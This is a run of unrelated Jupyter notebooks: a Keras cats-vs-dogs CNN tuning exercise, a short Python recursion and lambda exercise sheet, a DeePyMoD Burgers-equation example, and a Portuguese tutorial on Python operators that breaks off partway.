# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss=objective, optimizer='adam', metrics=['accuracy'])
return model
model = catdog()
model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 4,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
RMSprop is better than adam, so we will choose RMSprop in our best model. Change the kernel initializer Change the kernel_initializer to 'random_uniform'
###Code
optimizer = RMSprop(lr=1e-4)
objective = 'binary_crossentropy'
def catdog():
model = Sequential()
model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu'))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(64,kernel_initializer='random_uniform',bias_initializer='zeros'))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy'])
return model
model = catdog()
model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 4,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
We get a very low test accuracy. Change the number of convolution filters Reduce the number of convolution filters and see the change
###Code
import os, cv2, random
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import ticker
import seaborn as sns
%matplotlib inline
from keras.models import Sequential
from keras.layers import Input, Dropout, Flatten, Convolution2D, MaxPooling2D, Dense, Activation
from keras.optimizers import RMSprop
from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping
from keras.utils import np_utils
TRAIN_DIR = './train/train/'
TEST_DIR = './test/test/'
ROWS = 32
COLS = 32
CHANNELS = 1
train_images = [TRAIN_DIR + i for i in os.listdir(TRAIN_DIR)] # use this for full dataset
test_images = [TEST_DIR + i for i in os.listdir(TEST_DIR)]
def read_image(file_path):
img = cv2.imread(file_path, cv2.IMREAD_GRAYSCALE)
return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC)
def prep_data(images):
count = len(images)
data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8)
for i, image_file in enumerate(images):
image = read_image(image_file)
data[i] = image.T
if i % 2500 == 0: print('Processed {} of {}'.format(i, count))
return data
train = prep_data(train_images)
test = prep_data(test_images)
print("Train shape: {}".format(train.shape))
print("Test shape: {}".format(test.shape))
labels = []
for i in train_images:
if 'dog' in i:
labels.append(1)
else:
labels.append(0)
train = train.reshape(-1, 32,32,1)
test = test.reshape(-1, 32,32,1)
X_train = train.astype('float32')
X_test = test.astype('float32')
X_train /= 255
X_test /= 255
Y_train = labels
X_valid = X_train[:5000, :, :, :]
Y_valid = Y_train[:5000]
X_train = X_train[5001:25000, :, :, :]
Y_train = Y_train[5001:25000]
print("Training matrix shape", X_train.shape)
print("Testing matrix shape", X_test.shape)
def CatDog():
#Neural network model object
model = Sequential()
#First convolution
model.add(Convolution2D(
16, 3, 3,
border_mode = 'same',
input_shape = (ROWS, COLS, CHANNELS),
activation = 'relu'
))
#First dimensionality reduction
model.add(
MaxPooling2D( pool_size = (2, 2) )
)
#Second convolution
model.add(Convolution2D(
32, 3, 3,
border_mode = 'same',
activation = 'relu'
))
#Second dimensionality reduction
model.add(
MaxPooling2D( pool_size = (2, 2) )
)
#Dimensionality reduction to single array
model.add(Flatten())
#Dense layers - linear model on flattened array
model.add(Dense(100, activation = 'relu'))
#Prevent overfitting by randomly setting some model coeffecients to zero
model.add(Dropout(0.5))
#More dense layers
model.add(Dense(100, activation = 'relu'))
#More overfitting prevention
model.add(Dropout(0.5))
#Last dense layer
model.add(Dense(1))
#Add output to model
model.add(Activation('sigmoid'))
#Compile model and return
model.compile(
loss = 'binary_crossentropy',
optimizer = 'adam',
metrics=['accuracy']
)
return model
model = CatDog()
model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 4,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
We find the train accuracy increases and the convolution speed is faster. Increase the number of convolution filters and see the change
###Code
optimizer = 'adam'
objective = 'binary_crossentropy'
def catdog():
model = Sequential()
model.add(Convolution2D(16, 3, 3, border_mode='same', input_shape=(ROWS, COLS, CHANNELS), activation='relu'))
model.add(Convolution2D(16, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 1)))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 1)))
model.add(Conv2D(256, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(256, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(256, (3, 3), padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy'])
return model
model = catdog()
nb_epoch = 4
batch_size = 128
model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch,
verbose=1, validation_data=(X_valid, Y_valid))
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
The test accuracy is very low and the convolution speed is too slow, but the train accuracy is high. Find the best number of epochs Finally we get two models: one is 32x32 with 4 convolution layers and adam as the optimizer, the other is 64x64 with 8 convolution layers and RMSprop as the optimizer. We used 4 epochs before; in fact we don't know the best number of epochs, so we train for 80 epochs to see the tendency of the training and validation accuracy.
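A quick way to visualise that tendency is to plot the history object returned by model.fit (a sketch; it assumes this Keras version logs accuracy under the 'acc'/'val_acc' keys, as the training output above suggests):
###Code
import matplotlib.pyplot as plt

def plot_history(history):
    # history is the object returned by model.fit(...)
    plt.plot(history.history['acc'], label='train accuracy')
    plt.plot(history.history['val_acc'], label='validation accuracy')
    plt.xlabel('epoch')
    plt.ylabel('accuracy')
    plt.legend()
    plt.show()
###Output
_____no_output_____
###Markdown
The cell below rebuilds the 32x32 pipeline and trains that model for 80 epochs.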
###Code
TRAIN_DIR = './train/train/'
TEST_DIR = './test/test/'
ROWS = 32
COLS = 32
CHANNELS = 1
train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset
train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i]
train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i]
test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)]
def read_image(file_path):
img = cv2.imread(file_path, cv2.IMREAD_GRAYSCALE) #cv2.IMREAD_GRAYSCALE
return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC)
def prep_data(images):
count = len(images)
data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8)
for i, image_file in enumerate(images):
image = read_image(image_file)
data[i] = image.T
if i%2500 == 0: print('Processed {} of {}'.format(i, count))
return data
train = prep_data(train_images)
test = prep_data(test_images)
print("Train shape: {}".format(train.shape))
print("Test shape: {}".format(test.shape))
labels = []
for i in train_images:
if 'dog' in i:
labels.append(1)
else:
labels.append(0)
train = train.reshape(-1, 32,32,1)
test = test.reshape(-1, 32,32,1)
X_train = train.astype('float32')
X_test = test.astype('float32')
X_train /= 255
X_test /= 255
Y_train=labels
X_valid = X_train[:5000,:,:,:]
Y_valid = Y_train[:5000]
X_train = X_train[5001:25000,:,:,:]
Y_train = Y_train[5001:25000]
print("Training matrix shape", X_train.shape)
print("Testing matrix shape", X_test.shape)
optimizer = 'adam'
objective = 'binary_crossentropy'
def catdog():
model = Sequential()
model.add(Convolution2D(16, 3, 3, border_mode='same', input_shape=(ROWS, COLS, CHANNELS), activation='relu'))
model.add(Convolution2D(16, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
#model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
#model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
#model.add(MaxPooling2D(pool_size=(1, 1)))
#model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
#model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
#model.add(MaxPooling2D(pool_size=(1, 1)))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy'])
return model
model = catdog()
model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 80,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
 So we think this model's best epochs number should be 30
###Code
model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 30,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
The train accuracy is 0.97 and the validation accuracy is 0.73
###Code
TRAIN_DIR = './train/train/'
TEST_DIR = './test/test/'
ROWS = 64
COLS = 64
CHANNELS = 3
train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset
train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i]
train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i]
test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)]
def read_image(file_path):
img = cv2.imread(file_path, cv2.IMREAD_COLOR) #cv2.IMREAD_GRAYSCALE
return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC)
def prep_data(images):
count = len(images)
data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8)
for i, image_file in enumerate(images):
image = read_image(image_file)
data[i] = image.T
if i%2500 == 0: print('Processed {} of {}'.format(i, count))
return data
train = prep_data(train_images)
test = prep_data(test_images)
print("Train shape: {}".format(train.shape))
print("Test shape: {}".format(test.shape))
labels = []
for i in train_images:
if 'dog' in i:
labels.append(1)
else:
labels.append(0)
train = train.reshape(-1,3,64,64)
test = test.reshape(-1,3,64,64)
X_train = train.astype('float64')
X_test = test.astype('float64')
X_train /= 255
X_test /= 255
Y_train = labels
X_valid = X_train[:5000, :, :, :]
Y_valid = Y_train[:5000]
X_train = X_train[5001:25000, :, :, :]
Y_train = Y_train[5001:25000]
print("Training matrix shape", X_train.shape)
print("Testing matrix shape", X_test.shape)
sns.countplot(labels)
plt.title('Cats and Dogs')
optimizer = RMSprop(lr=1e-4)
objective = 'binary_crossentropy'
def catdog():
model = Sequential()
model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu'))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy'])
return model
model = catdog()
history = model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 80,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
 We think the best number should be around 24
###Code
history = model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 24,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
|
phython paper.ipynb | ###Markdown
Q1 Write a Python program to calculate the sum of a list of numbers using a recursive function. For any given list like [2, 4, 5, 6, 7] and a recursive function, i.e. def list_sum(num_List), which one of the following options related to the code will be correct?
###Code
def listsum(numlist):
if len(numlist)==1:
return numlist[0]
else:
return numlist[0]+listsum(numlist[1:])
print(listsum([2,4,5,6,7]))
###Output
24
###Markdown
Q2 Write a Python program to calculate the value of 'a' to the power 'b' using recursion. Suppose the recursive function has been defined as def power(a, b), where a is the base and b is the exponent. Then which of the following options cannot be true?
###Code
def power(a,b):
if b==0:
return 1
elif b==1:
return a
else:
return(a*power(a,b-1))
a=4
b=2
print(power(a,b))
###Output
16
###Markdown
Q3 Write a Python program to count repeated characters in a string. State whether a dictionary might be helpful in this case or not.
###Code
import collections
str1="hhfgffgfgcgchcdfdtd"
d=collections.defaultdict(int)
for c in str1:
d[c]+=1
for c in sorted(d,key=d.get,reverse= True):
if d[c]>1:
print("%s%d"%(c,d[c]))
###Output
f5
g4
h3
c3
d3
###Markdown
Q4 Write a Python program to find the intersection of two given arrays using lambda. Which of the following will be the correct interpretation of the lambda expression? Note that here array_nums1 and array_nums2 are two input arrays.
###Code
num1=[2,4,6,7]
num2=[1,2,3]
print("orignalarrays:")
print(num1)
print(num2)
result=list(filter(lambda x:x in num1,num2))
print("\n intersection of the array:",result)
###Output
original arrays:
[2, 4, 6, 7]
[1, 2, 3]
intersection of the array: [2]
###Markdown
Q5 Write a Python program to add two given lists and find the difference between lists. Use the map() function. Which of the following would be the correct function definition?
###Code
num1=[1,2,3,4,5]
num2=[2,4,5,6]
print("list:")
print(num1)
print(num2)
result=map(lambda x,y:x+y,num1,num2)
print(list(result))
###Output
list:
[1, 2, 3, 4, 5]
[2, 4, 5, 6]
[3, 6, 8, 10]
###Markdown
Q6 Write a recursive Python program to copy one string to another. Which of the following can be the base condition?
###Code
def copy_string(str,str1,i):
str1[i]=str[i]
if(str[i]=='\0'):
return
copy_string(str,str1,i+1)
str=input("enter the string")
str+='\0'
str1=[0]*(len(str))
copy_string(str,str1,0)
print("copy string is:","".join(str1))
###Output
enter the stringharsh
copy string is: harsh
|
examples/Example_new_deepmod.ipynb | ###Markdown
In this notebook we show how to use the new deepymod code and phimal utilities to load data and perform data analysis:
###Code
import numpy as np
import pandas as pd
import torch
from DeePyMoD_SBL.deepymod_torch.library_functions import library_1D_in
from DeePyMoD_SBL.deepymod_torch.DeepMod import DeepModDynamic
from DeePyMoD_SBL.deepymod_torch.training import train_dynamic
from sklearn.linear_model import LassoLarsIC
from phimal_utilities.data import Dataset
from phimal_utilities.data.burgers import BurgersDelta
from phimal_utilities.analysis import load_tensorboard
if torch.cuda.is_available():
torch.set_default_tensor_type('torch.cuda.FloatTensor')
import seaborn as sns
import matplotlib.pyplot as plt
plt.style.use('ggplot')
%load_ext autoreload
%autoreload 2
###Output
The autoreload extension is already loaded. To reload it, use:
%reload_ext autoreload
###Markdown
Making data
###Code
x = np.linspace(-3, 4, 100)
t = np.linspace(0.5, 5.0, 50)
x_grid, t_grid = np.meshgrid(x, t, indexing='ij')
###Output
_____no_output_____
###Markdown
Create a dataset by giving your solution to the object and its parameters (make sure they're named)
###Code
dataset = Dataset(BurgersDelta, v=0.1, A=1.0)
###Output
_____no_output_____
###Markdown
We can easily generate a solution given our grid:
###Code
u = dataset.generate_solution(x_grid, t_grid)
frame = 10
plt.plot(x, u[:, frame - 10])
plt.plot(x, u[:, frame])
plt.plot(x, u[:, frame + 10])
###Output
_____no_output_____
###Markdown
Or check if our solution is correct using the library:
###Code
theta = dataset.library(x_grid.reshape(-1, 1), t_grid.reshape(-1, 1))
dt = dataset.time_deriv(x_grid.reshape(-1, 1), t_grid.reshape(-1, 1))
np.linalg.lstsq(theta, dt, rcond=None)[0]
###Output
_____no_output_____
###Markdown
We can also automatically create input data for deepmod. To confirm that we add noise, we use all samples (set n_samples=0 for all) and turn off randomization:
###Code
X_train, y_train = dataset.create_dataset(x_grid.reshape(-1, 1), t_grid.reshape(-1, 1), n_samples=0, noise=0.1, random=False)
u_noisy = y_train.reshape(x_grid.shape).cpu().detach().numpy()
frame = 10
plt.plot(x, u[:, frame], label='True')
plt.plot(x, u_noisy[:, frame], label='Noisy')
plt.legend()
###Output
_____no_output_____
###Markdown
Now let's generate a real dataset:
###Code
X_train, y_train = dataset.create_dataset(x_grid.reshape(-1, 1), t_grid.reshape(-1, 1), n_samples=2000, noise=0.1, random=True)
###Output
_____no_output_____
###Markdown
Running deepmod Now we show how to use the new deepmod. We first define which sparsity estimator we want to use. All estimators from scikit-learn are fine. Set fit_intercept to False, as that term is already in our model.
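For example (a sketch; the assumption, following the note above, is that any scikit-learn linear estimator exposing fit and coef_ can be passed in the same way):
###Code
from sklearn.linear_model import Lasso, OrthogonalMatchingPursuit

# possible alternatives to LassoLarsIC; the hyperparameters here are illustrative only
alternative_estimators = {
    'lasso': Lasso(alpha=1e-3, fit_intercept=False),
    'omp': OrthogonalMatchingPursuit(fit_intercept=False),
}
###Output
_____no_output_____
###Markdown
In this notebook we stick with LassoLarsIC, defined in the cell below.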
###Code
estimator = LassoLarsIC(fit_intercept=False)
###Output
_____no_output_____
###Markdown
Then we define the config and build the model as always:
###Code
config = {'n_in': 2, 'hidden_dims': [30, 30, 30, 30, 30], 'n_out': 1, 'library_function':library_1D_in, 'library_args':{'poly_order':2, 'diff_order': 2}, 'sparsity_estimator': estimator}
model = DeepModDynamic(**config)
#In the future, I want to change the api so that we would do the following:
'''
function_approximator = network(n_in=2, hidden_dims=[30, 30, 30, 30, 30], n_out=1)
library = Library(function=library_1D_in, poly_order=2, deriv_order=2)
sparse_estimator = Estimator(fit_intercept=False)
model = DeepMoD(function_approximator, library, sparse_estimator)
'''
# main reason is not to get a massive config dictionary which is not very clear. This would also be super flexible.
###Output
_____no_output_____
###Markdown
Define the optimizer:
###Code
optimizer = torch.optim.Adam(model.network_parameters(), betas=(0.99, 0.999), amsgrad=True)
###Output
_____no_output_____
###Markdown
And train for 15k iterations. We start the sparsity update after 5000 iterations, so we have a good estimate of the data, and update it every 200 iterations after that:
###Code
train_dynamic(model, X_train, y_train, optimizer, 15000, loss_func_args={'start_sparsity_update': 5000, 'sparsity_update_period': 200})
###Output
| Iteration | Progress | Time remaining | Cost | MSE | Reg | L1 |
15000 100.00% 0s 3.44e-04 3.41e-04 2.66e-06 0.00e+00
###Markdown
We get the following coefficients from the sparsity model (which are biased by the l1):
###Code
model.sparsity_estimator.coef_
###Output
_____no_output_____
###Markdown
The unbiased coefficients we get from the network by:
###Code
model.constraints.coeff_vector
###Output
_____no_output_____
###Markdown
It has one extra term, but it's super small. That's an issue for next time. This is done with 10% noise. Analysing To analyse more in depth, we can load the tensorboard file:
###Code
# right now works with file path, will change to experiment_ID
df = load_tensorboard('runs/Apr22_16-06-14_4b6076e78386/')
df.head(5)
###Output
_____no_output_____
###Markdown
All the keys are:
###Code
df.keys()
###Output
_____no_output_____
###Markdown
We plot the losses:
###Code
plt.figure(figsize=(20, 5))
plt.subplot(131)
plt.semilogy(df.index, df['Total_loss'], label='Total')
plt.semilogy(df.index, df['MSE_0'], label='MSE')
plt.semilogy(df.index, df['Regression_0'], label='PI')
plt.title('All losses')
plt.legend()
plt.subplot(132)
plt.semilogy(df.index, df['MSE_0'], label='MSE')
plt.title('MSE')
plt.subplot(133)
plt.semilogy(df.index, df['Regression_0'], label='PI')
plt.title('Regression')
###Output
_____no_output_____
###Markdown
Now let's look at the coefficients:
###Code
coeff_keys = [key for key in df.keys() if key[:5]=='coeff']
scaled_coeff_keys = [key for key in df.keys() if key[:6]=='scaled']
for key in coeff_keys:
plt.plot(df[key], label=f'{key[-1]}')
plt.legend()
plt.ylim([-1.5, 0.5])
plt.title('Coefficients')
for key in scaled_coeff_keys:
plt.plot(df[key], label=f'{key[-1]}')
plt.legend()
plt.ylim([-1.5, 1])
plt.title('Scaled coefficients')
###Output
_____no_output_____
###Markdown
So we do see a few kinks, but not many and certainly with minimal effect. We can also check when terms are in the model:
###Code
in_model = []
for key in scaled_coeff_keys:
in_model.append(df[key].to_numpy()[:, None])
in_model = np.concatenate(in_model, axis=1)
in_model[np.abs(in_model) > 0 ]= 1
sns.heatmap(in_model)
plt.title('Heatmap of coefficients in model')
###Output
_____no_output_____ |
python-language/Operadores.ipynb | ###Markdown
> **Author:** Érick Barbosa de Souza>> **Home:** https://abre.ai/ebsouza-pagina>> **Instagram:** @erickbsouza--- **Operators**Operators are special symbols that have their own meaning in the language and are associated with specific operations. In Python there are, for example, arithmetic, logical, comparison, and assignment operators, among others. Every operator needs at least one operand. For example, the expression 'a + b' contains one operator (+) and two operands ('a' and 'b'). Another example is the expression 'not a', which has only one operator (not) and one operand (a). **Arithmetic operators**These perform mathematical operations between two numeric values. | Operator | Meaning | Example || :--- | :----: | ---: || + | Adds two values | a + b || - | Subtracts two values | a - b || * | Multiplies two values | a * b || / | Divides the left value by the right value | a / b || // | Integer result of the division performed by '/' | a // b || % | Remainder of the division 'a / b' | a % b || ** | Raises 'a' to the power of 'b' | a ** b |
###Code
#Exemplos
a = 22
b = 4
# Output: a + b = 26
print('a + b =',a+b)
# Output: a - b = 18
print('a - b =',a-b)
# Output: a * b = 88
print('a * b =',a*b)
# Output: a / b = 5.5
print('a / b =',a/b)
# Output: a // b = 5
print('a // b =',a//b)
# Output: a % b = 2
print('a % b =',a%b)
# Output: a ** b = 234256
print('a ** b =',a**b)
###Output
a + b = 26
a - b = 18
a * b = 88
a / b = 5.5
a // b = 5
a % b = 2
a ** b = 234256
###Markdown
**Comparison operators**These compare two values, and the result of the operation is a boolean value. | Operator | Meaning | Example || :--- | :----: | ---: || > | 'a' greater than 'b' | a > b || < | 'a' less than 'b' | a < b || == | 'a' equal to 'b' | a == b || != | 'a' different from 'b' | a != b || >= | 'a' greater than OR equal to 'b' | a >= b || <= | 'a' less than OR equal to 'b' | a <= b |
###Code
a = 15
b = 28
# Output: a > b is False
print('a > b is',a>b)
# Output: a < b is True
print('a < b is',a<b)
# Output: a == b is False
print('a == b is',a==b)
# Output: a != b is True
print('a != b is',a!=b)
# Output: a >= b is False
print('a >= b is',a>=b)
# Output: a <= b is True
print('a <= b is',a<=b)
###Output
a > b is False
a < b is True
a == b is False
a != b is True
a >= b is False
a <= b is True
###Markdown
In Python it is also possible to chain comparison operators.
###Code
x = 28
# Output: 10 < x < 20 is False
print('10 < x < 20 is', 10<x<20)
# Output: 20 < b < 30 is True
print('20 < x < 30 is', 20<x<30)
###Output
10 < x < 20 is False
20 < x < 30 is True
###Markdown
**Logical operators**These operators take boolean values as operands. | Operator | Meaning | Example || :--- | :----: | ---: || and | True if 'a' AND 'b' are true | a and b || or | True if 'a' OR 'b' is true | a or b || not | Inverts the boolean value | not a |
###Code
a = True
b = False
print('a and b is',a and b) # Conjunção(AND) entre 'a' e 'b'
print('a or b is',a or b) # Disjunção(OR) entre 'a' e 'b'
print('not a is',not a) # Negação(NOT) de 'a'
###Output
a and b is False
a or b is True
not a is False
###Markdown
**Bitwise operators**These operators act directly on the bits of the operated values. For example, the operation 'a & b' results in a value whose bits are the conjunction (AND) of the corresponding bits of 'a' and 'b' at the same position.> **a** = 10 (0000 1010)>> **b** = 4 (0000 0100)> > **a** **&** **b** = 0 (0000 0000)
###Code
a = 10 # (0000 1010)
b = 4 # (0000 0100)
print(f"a & b = {a & b} (0000 0000)" ) # Conjunção(AND) entre bits
print(f"a | b = {a | b} (0000 1110)" ) # Disjunção(OR) entre bits
print(f"~a = {~a} (1111 0101)" ) # Negação(NOT) de cada bit
print(f"a ^ b = {a ^ b} (0000 1110)" ) # Ou exclusivo(XOR) entre bits
print(f"a >> 2 = {a >> 2} (0000 0010)" ) # Shift a direita, 2 neste exemplo
print(f"a << 2 = {a << 2} (0010 1000)" ) # Shift a esquerda, 2 neste exemplo
###Output
a & b = 0 (0000 0000)
a | b = 14 (0000 1110)
~a = -11 (1111 0101)
a ^ b = 14 (0000 1110)
a >> 2 = 2 (0000 0010)
a << 2 = 40 (0010 1000)
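###Markdown
To see the bit patterns behind these results, Python's built-in `bin()` function can be used — a small illustrative check with the same values as above:
###Code
a = 10  # 0b1010
b = 4   # 0b100
print(bin(a), bin(b))          # show the bit patterns of 'a' and 'b'
print(bin(a & b), bin(a | b))  # 0b0 and 0b1110, matching the results above
###Output
_____no_output_____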
###Markdown
**Assignment operators**The assignment operator (=) can be combined with other operators, which makes writing code considerably quicker. After all, writing x += 3 is much faster than x = x + 3, isn't it? Check out the other equivalences below.
###Code
print( " 'x += 3' é equivalente a 'x = x + 3' ")
print( " 'x -= 3' é equivalente a 'x = x - 3' ")
print( " 'x *= 3' é equivalente a 'x = x * 3' ")
print(" ")
print( " 'x /= 3' é equivalente a 'x = x / 3' ")
print( " 'x %= 3' é equivalente a 'x = x % 3' ")
print( " 'x //= 3' é equivalente a 'x = x // 3' ")
print(" ")
print( " 'x **= 3' é equivalente a 'x = x ** 3' ")
print( " 'x &= 3' é equivalente a 'x = x & 3' ")
print( " 'x |= 3' é equivalente a 'x = x | 3' ")
print(" ")
print( " 'x ^= 3' é equivalente a 'x = x ^ 3' ")
print( " 'x >>= 3' é equivalente a 'x = x >> 3' ")
print( " 'x <<= 3' é equivalente a 'x = x << 3' ")
###Output
'x += 3' é equivalente a 'x = x + 3'
'x -= 3' é equivalente a 'x = x - 3'
'x *= 3' é equivalente a 'x = x * 3'
'x /= 3' é equivalente a 'x = x / 3'
'x %= 3' é equivalente a 'x = x % 3'
'x //= 3' é equivalente a 'x = x // 3'
'x **= 3' é equivalente a 'x = x ** 3'
'x &= 3' é equivalente a 'x = x & 3'
'x |= 3' é equivalente a 'x = x | 3'
'x ^= 3' é equivalente a 'x = x ^ 3'
'x >>= 3' é equivalente a 'x = x >> 3'
'x <<= 3' é equivalente a 'x = x << 3'
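###Markdown
A minimal demonstration of a few of these compound assignments in action (the values here are hypothetical, chosen just for illustration):
###Code
x = 10
x += 3   # same as x = x + 3  -> 13
print(x)
x *= 2   # same as x = x * 2  -> 26
print(x)
x //= 4  # same as x = x // 4 -> 6
print(x)
x **= 2  # same as x = x ** 2 -> 36
print(x)
###Output
_____no_output_____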
###Markdown
**Identity operators**Similar to the comparison operators, these check whether the operands are the same object, and not merely equal in content (values).These operators become even more important when working with Object-Oriented Programming.
###Code
a = 1
b = '1'
